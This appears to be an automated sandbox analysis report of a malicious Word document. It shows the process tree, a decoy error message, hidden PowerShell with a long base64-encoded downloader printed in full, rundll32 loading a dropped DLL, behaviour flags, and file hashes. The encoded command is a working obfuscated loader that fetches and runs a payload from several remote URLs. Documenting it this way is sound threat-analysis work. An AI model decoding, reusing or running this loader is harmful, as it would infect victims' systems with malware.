KAAoACcASwAnACsAJwApACgAJwApACkAKwAoACgAJwBtAGIAJwArACcAMQApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAGAAcABsAGkAVAAiACgAJABPAGcAMgByADEAZwBpACAAKwAgACQASABoAGIAbgBxAGUAawAgACsAIAAkAEUAMgBiAGYAbABoAHUAKQA7ACQAQQBxAGQAMgB1AGgANgA9ACgAJwBZAHoAJwArACcAXwBuACcAKwAoACcAcgAnACsAJwBoAGQAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAMgByAHAAbQBnAGUAIABpAG4AIAAkAEcAaABrAGcAMwBoAGUAIAB8ACAAUwBvAFIAdABgAC0ATwBiAGoAZQBgAGMAVAAgAHsAZwBlAGAAVAAtAHIAYABBAGAATgBkAE8ATQB9ACkAewB0AHIAeQB7ACQAUwB4ADEAagB1AGUAbwAuACIARABgAG8AVwBuAGwAYABvAEEAYABkAEYAaQBMAGUAIgAoACQAVgAyAHIAcABtAGcAZQAsACAAJABQAHgAegB4ADgAegByACkAOwAkAEcAeQB2ADkAZAAyAGUAPQAoACcAUQBzACcAKwAoACcAdwBwACcAKwAnAGIANgAnACkAKwAnAGwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFAAeAB6AHgAOAB6AHIAKQAuACIAbABFAG4AYABnAFQAaAAiACAALQBnAGUAIAA0ADUANwA5ADIAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyAC4AZQAnACsAJwB4AGUAJwApACAAJABQAHgAegB4ADgAegByACwAMAA7ACQAVABkAGQAYwBfADMAbQA9ACgAKAAnAEQAdABiACcAKwAnAGcANgAnACkAKwAnAHcAJwArACcAMAAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQB5AHcAeABvAGsAPQAoACcAUwAnACsAKAAnAGQAYwAnACsAJwB3AHEAdgBjACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAGsAMgBlAF8AcgBpAD0AKAAoACcARwB4ACcAKwAnAF8AJwApACsAKAAnAGkAJwArACcAYwBnADQAJwApACkA
    Process spawned unexpected child process
    Suspicious use of WriteProcessMemory
    PID:1416
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      PID:336
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      POwersheLL -w hidden -ENCOD JAAwADYAVAAgAD0AIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBGACcAZQBtAC4AaQBvAC4ARABpAHIARQBDACcALAAnAHMAWQBTAHQAJwAsACcAUgBZACcALAAnAFQATwAnACkAOwAgACQAOQB5AGUASAA1AE0AIAA9AFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADkAfQB7ADMAfQB7ADIAfQB7ADcAfQB7ADQAfQB7ADAAfQB7ADgAfQB7ADEAfQB7ADYAfQAiACAALQBGACAAJwBPAEkAbgBUACcALAAnAEUAJwAsACcALgBuAEUAVAAuAHMARQAnACwAJwBzAFQAZQBNACcALAAnAGkAQwBFAFAAJwAsACcAcwAnACwAJwBSACcALAAnAFIAdgAnACwAJwBNAEEATgBBAEcAJwAsACcAWQAnACkAOwAkAFQAcAA5AHEAdgByAHAAPQAoACgAJwBDAGYAJwArACcAZgAnACkAKwAnAGUAZgAnACsAJwAyAG8AJwApADsAJABIAGgAYgBuAHEAZQBrAD0AJABKADAAeQAxAGsAbgBmACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABBAGUAZQAwADIAMwA3ADsAJABHAHEAeABiAGgANQBnAD0AKAAoACcAVQBfACcAKwAnAGEAJwApACsAJwB2ADYAJwArACcAZwBtACcAKQA7ACAAKAAgAEcAYwBpACAAIAAoACcAVgBhAHIAJwArACcASQBBAEIAbABFACcAKwAnADoAMAA2AFQAJwApACAAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAYABSAEUAYQBgAFQAYABlAEQASQByAEUAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAzACcAKwAnAFQATAAnACkAKwAoACcAWgBoACcAKwAnAG8AZAAxACcAKQArACgAJwBhACcAKwAnAGwAMwBUACcAKQArACgAJwBMAE4ANwAnACsAJwB6ACcAKwAnADgAcQAnACkAKwAnADMAJwArACgAJwA5ADMAVAAnACsAJwBMACcAKQApAC4AIgBSAEUAYABwAEwAYABBAGMAZQAiACgAKAAnADMAJwArACcAVABMACcAKQAsAFsAUwB0AFIAaQBuAGcAXQBbAGMASABBAHIAXQA5ADIAKQApACkAOwAkAE0AaQB1AHIAZQBpAGsAPQAoACgAJwBHADEAcQAnACsAJwBxAG4AJwApACsAJwByAHkAJwApADsAIAAkADkAeQBlAEgANQBNADoAOgAiAHMARQBDAHUAUgBgAEkAYABUAHkAcAByAE8AYABUAG8AYABjAE8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQARwB3ADcAMQBlAG0AagA9ACgAKAAnAFUAJwArACcAZgA5ACcAKQArACgAJwBsAG0AdQAnACsAJwBuACcAKQApADsAJABHAGwAeAB4ADUAcAB5ACAAPQAgACgAKAAnAFUAbgByACcAKwAnAHQAaAAnACsAJwBwACcAKQArACcAcABhACcAKwAnAGYAJwApADsAJABVAHMAbgAxAGYAbABtAD0AKAAoACcASQAnACsAJwBpAGsAeAB4ACcAKQArACcAZgAwACcAKQA7ACQAUgAwAGsAXwBiADEAbQA9ACgAKAAnAFIAXwAnACsAJwBfACcAKQArACgAJwBlAGUANgAnACsAJwBoACcAKQApADsAJABQAHgAegB4ADgAegByAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AWgBoAG8AZAAxAGEAbAB7ADAAJwArACcAfQBOADcAegAnACsAJwA4AHEAMwA5AHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAYwBIAGEAUgBdADkAMgApACsAJABHAGwAeAB4ADUAcAB5ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABPADcAdgAzAGYAYwBhAD0AKAAnAFoAeQAnACsAKAAnAGkAZQB0ACcAKwAnAGYAMgAnACkAKQA7ACQAUwB4ADEAagB1AGUAbwA9AE4AZQBgAHcALQBvAGIAYABqAGUAYwB0ACAAbgBlAHQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQARwBoAGsAZwAzAGgAZQA9ACgAKAAoACcAaAB0AHQAcABzACcAKwAnADoAJwApACsAJwBLACcAKwAnACkAJwArACgAKAAnACgAbQAnACsAJwBiADEAKQAoAEsAJwApACkAKwAnACkAJwArACcAKAAnACsAKAAnAG0AYgAnACsAJwAxACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBiAHUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AG4AJwArACcAZQAnACkAKwAoACcAcgAnACsAJwAuAGMAJwApACsAKAAnAGwAYQBiAHIAaQBzACcAKwAnAC4AJwArACcAcwBlACcAKwAnAEsAJwApACsAKAAoACcAKQAoACcAKQApACsAJwBtAGIAJwArACcAMQAnACsAKAAoACcAKQAoACcAKQApACsAKAAnAHUAYwBqAGsAJwArACcANwBzAHQALgAnACkAKwAoACcAegBpAHAAJwArACcAQAAnACkAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQAnACsAJwBiADEAKQAnACsAJwAoAGIAZQAnACkAKQArACcAcwAnACsAJwBwACcAKwAoACcAbwAnACsAJwBrAGUAJwApACsAKAAnAHcAZQBkACcAKwAnAGQAJwApACsAJwBpAG4AJwArACgAJwBnAHMAJwArACcALgAnACkAKwAnAGkAJwArACgAKAAnAGUASwApACgAJwArACcAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQAnACsAJwApACgAJwApACkAKwAoACcAawAnACsAJwAxAGMAOABkAGgAJwApACsAJwA0ACcAKwAoACcALgByACcAKwAnAGEAJwApACsAKAAnAHIAQABoAHQAdAAnACsAJwBwACcAKQArACgAKAAnAHMAJwArACcAOgBLACkAKABtACcAKwAnAGIAMQAnACsAJwApACgASwApACcAKQApACsAKAAoACcAKABtAGIAMQAnACsAJwApACgAJwArACcAYwBvACcAKQApACsAKAAnAG4AagAnACsAJwB1AHIAJwApACsAKAAnAG8AcwAnACsAJwBkAGUAYQAnACkAKwAoACcAbQBvACcAKwAnAHIAJwApACsAKAAnAHkAaAAnACsAJwBlAGMAJwApACsAKAAnAGgAaQAnACsAJwBjAGUAcgBpAGEAJwApACsAJwBhACcAKwAoACgAJwBjAGEAYwAnACsAJwBpAG8ALgBjAG8AJwArACcAbQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AJwArACcAYgAxACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAHQAagAnACkAKQArACgAJwBiACcAKwAnAGQAaABkAHYAaQAnACsAJwAxAC4AJwApACsAKAAnAHoAaQBwACcAKwAnAEAAaAAnACkAKwAoACgAJwB0AHQAcABzACcAKwAnADoASwApACgAbQAnACsAJwBiACcAKQApACsAKAAoACcAMQApACcAKwAnACgASwAnACsAJwApACgAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQApACcAKQApACsAKAAoACcAKABrACcAKwAnAGUAaQB0ACcAKQApACsAKAAnAGEAJwArACcAdQBuAGkAdgAuACcAKwAnAGsAZQAnACkAKwAoACcAaQB0ACcAKwAnAGEAJwApACsAKAAnAC4AYQAnACsAJwBlAEsAJwApACsAKAAoACcAKQAoAG0AJwArACcAYgAxACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAYwBoAGYAJwApACkAKwAoACcAdgBkAHMAJwArACcAZAAnACkAKwAnADcALgAnACsAJwByACcAKwAnAGEAJwArACcAcgAnACsAJwBAACcAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAJwArACgAKAAnADoASwAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBtAGIAMQApACgAJwApACkAKwAnAEsAJwArACgAKAAnACkAKABtACcAKwAnAGIAMQApACcAKwAnACgAYwAnACkAKQArACcAbQAnACsAKAAnAHMALgBrACcAKwAnAGUAaQB0AGEAJwApACsAJwAuAGEAJwArACgAKAAnAGUAJwArACcASwApACgAbQBiADEAKQAoACcAKwAnAGgAJwArACcAMABtACcAKQApACsAKAAnAHEAcgAnACsAJwB6ACcAKQArACgAJwAuACcAKwAnAHIAYQAnACkAKwAnAHIAJwArACcAQAAnACsAJwBoACcAKwAoACgAJwB0AHQAcAAnACsAJwBzADoASwApACcAKwAnACgAbQBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQBiACcAKwAnADEAKQAoACcAKwAnAGEAJwApACkAKwAoACcAaQByACcAKwAnAGIAJwApACsAJwBvACcAKwAoACcAcgAnACsAJwBuAGUAZwAnACkAKwAnAHIAJwArACgAJwBvAHUAJwArACcAcAAnACkAKwAnAC4AJwArACcAbgAnACsAJwBlACcAKwAnAHQAJwArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiACcAKQApACsAJwAxACcAKwAoACgAJwApACgAeQA0ACcAKwAnADYAJwApACkAKwAnADEAeAAnACsAKAAnAHIAJwArACcAbQAuACcAKQArACcAegBpACcAKwAoACcAcABAACcAKwAnAGgAdAAnACkAKwAnAHQAJwArACcAcAAnACsAJwBzADoAJwArACgAKAAnAEsAKQAoACcAKwAnAG0AJwApACkAKwAnAGIAMQAnACsAKAAoACcAKQAoAEsAJwArACcAKQAoAG0AJwApACkAKwAoACgAJwBiADEAJwArACcAKQAoAHAAaAAnACsAJwBvACcAKwAnAG4AZQBzACcAKQApACsAJwAuAHAAJwArACgAJwBtAHIAcwBwAGEAJwArACcAaQAnACkAKwAnAG4AJwArACgAKAAnAC4AYwBvAG0ASwApACgAJwArACcAbQBiADEAKQAoAHgAegAnACsAJwBlACcAKwAnAG8AeAAnACkAKQArACcAbgA4ACcAKwAnAC4AJwArACcAcgBhACcAKwAnAHIAJwArACgAJwBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAnAEsAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBtAGIAJwApACkAKwAoACgAJwAxACkAKABLACkAKABtAGIAJwArACcAMQAnACsAJwApACgAJwArACcAbwAnACkAKQArACcAeQAnACsAKAAoACcAYQAuAHEAYQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AYgAxACkAJwArACcAKAAnACkAKQArACgAJwBsAGYAbwAnACsAJwBuAGwANQAuAHIAJwApACsAJwBhAHIAJwApACkALgAiAFIAYABFAGAAUABsAGEAYwBFACIAKAAoACgAKAAoACcASwAnACsAJwApACgAJwApACkAKwAoACgAJwBtAGIAJwArACcAMQApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAGAAcABsAGkAVAAiACgAJABPAGcAMgByADEAZwBpACAAKwAgACQASABoAGIAbgBxAGUAawAgACsAIAAkAEUAMgBiAGYAbABoAHUAKQA7ACQAQQBxAGQAMgB1AGgANgA9ACgAJwBZAHoAJwArACcAXwBuACcAKwAoACcAcgAnACsAJwBoAGQAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAMgByAHAAbQBnAGUAIABpAG4AIAAkAEcAaABrAGcAMwBoAGUAIAB8ACAAUwBvAFIAdABgAC0ATwBiAGoAZQBgAGMAVAAgAHsAZwBlAGAAVAAtAHIAYABBAGAATgBkAE8ATQB9ACkAewB0AHIAeQB7ACQAUwB4ADEAagB1AGUAbwAuACIARABgAG8AVwBuAGwAYABvAEEAYABkAEYAaQBMAGUAIgAoACQAVgAyAHIAcABtAGcAZQAsACAAJABQAHgAegB4ADgAegByACkAOwAkAEcAeQB2ADkAZAAyAGUAPQAoACcAUQBzACcAKwAoACcAdwBwACcAKwAnAGIANgAnACkAKwAnAGwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFAAeAB6AHgAOAB6AHIAKQAuACIAbABFAG4AYABnAFQAaAAiACAALQBnAGUAIAA0ADUANwA5ADIAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyAC4AZQAnACsAJwB4AGUAJwApACAAJABQAHgAegB4ADgAegByACwAMAA7ACQAVABkAGQAYwBfADMAbQA9ACgAKAAnAEQAdABiACcAKwAnAGcANgAnACkAKwAnAHcAJwArACcAMAAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQB5AHcAeABvAGsAPQAoACcAUwAnACsAKAAnAGQAYwAnACsAJwB3AHEAdgBjACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAGsAMgBlAF8AcgBpAD0AKAAoACcARwB4ACcAKwAnAF8AJwApACsAKAAnAGkAJwArACcAYwBnADQAJwApACkA
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll 0
        Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll 0
          Blocklisted process makes network request
          Loads dropped DLL
          Checks whether UAC is enabled
          PID:1856
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll

                        MD5

                        455e8c40a659762249a13b5ef6cfb2cb

                        SHA1

                        818423b1fc4f4149e2bda0feb359c1605de1eb6c

                        SHA256

                        8ceb186696c9bda47466e5ecd1d0f0d5f93318e8bdc6b42454dd3be884e99e33

                        SHA512

                        7ba2b6f6c452009e74a31a0da2bc3a27e565fe12997c33cb0e8cf9397cd61ec232e2870516aa94e4f2affd2291f6b728b77775a6f8732dd5133a4df28a341123

                      • \Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll

                        MD5

                        455e8c40a659762249a13b5ef6cfb2cb

                        SHA1

                        818423b1fc4f4149e2bda0feb359c1605de1eb6c

                        SHA256

                        8ceb186696c9bda47466e5ecd1d0f0d5f93318e8bdc6b42454dd3be884e99e33

                        SHA512

                        7ba2b6f6c452009e74a31a0da2bc3a27e565fe12997c33cb0e8cf9397cd61ec232e2870516aa94e4f2affd2291f6b728b77775a6f8732dd5133a4df28a341123

                      • \Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll

                        MD5

                        455e8c40a659762249a13b5ef6cfb2cb

                        SHA1

                        818423b1fc4f4149e2bda0feb359c1605de1eb6c

                        SHA256

                        8ceb186696c9bda47466e5ecd1d0f0d5f93318e8bdc6b42454dd3be884e99e33

                        SHA512

                        7ba2b6f6c452009e74a31a0da2bc3a27e565fe12997c33cb0e8cf9397cd61ec232e2870516aa94e4f2affd2291f6b728b77775a6f8732dd5133a4df28a341123

                      • \Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll

                        MD5

                        455e8c40a659762249a13b5ef6cfb2cb

                        SHA1

                        818423b1fc4f4149e2bda0feb359c1605de1eb6c

                        SHA256

                        8ceb186696c9bda47466e5ecd1d0f0d5f93318e8bdc6b42454dd3be884e99e33

                        SHA512

                        7ba2b6f6c452009e74a31a0da2bc3a27e565fe12997c33cb0e8cf9397cd61ec232e2870516aa94e4f2affd2291f6b728b77775a6f8732dd5133a4df28a341123

                      • \Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll

                        MD5

                        455e8c40a659762249a13b5ef6cfb2cb

                        SHA1

                        818423b1fc4f4149e2bda0feb359c1605de1eb6c

                        SHA256

                        8ceb186696c9bda47466e5ecd1d0f0d5f93318e8bdc6b42454dd3be884e99e33

                        SHA512

                        7ba2b6f6c452009e74a31a0da2bc3a27e565fe12997c33cb0e8cf9397cd61ec232e2870516aa94e4f2affd2291f6b728b77775a6f8732dd5133a4df28a341123

                      • memory/336-3-0x0000000000000000-mapping.dmp

                      • memory/368-4-0x0000000000000000-mapping.dmp

                      • memory/368-5-0x000007FEF5110000-0x000007FEF5AFC000-memory.dmp

                      • memory/368-6-0x0000000002260000-0x0000000002261000-memory.dmp

                      • memory/368-8-0x0000000002340000-0x0000000002341000-memory.dmp

                      • memory/368-9-0x0000000002470000-0x0000000002471000-memory.dmp

                      • memory/368-10-0x000000001B690000-0x000000001B691000-memory.dmp

                      • memory/368-11-0x000000001C500000-0x000000001C501000-memory.dmp

                      • memory/368-7-0x000000001AD40000-0x000000001AD41000-memory.dmp

                      • memory/640-12-0x0000000000000000-mapping.dmp

                      • memory/1720-20-0x000007FEF6010000-0x000007FEF628A000-memory.dmp

                      • memory/1756-2-0x0000000005C61000-0x0000000005C63000-memory.dmp

                      • memory/1756-1-0x0000000006210000-0x0000000006214000-memory.dmp

                      • memory/1756-0-0x00000000003A4000-0x00000000003A8000-memory.dmp

                      • memory/1856-14-0x0000000000000000-mapping.dmp

                      • memory/1856-19-0x0000000000300000-0x000000000033D000-memory.dmp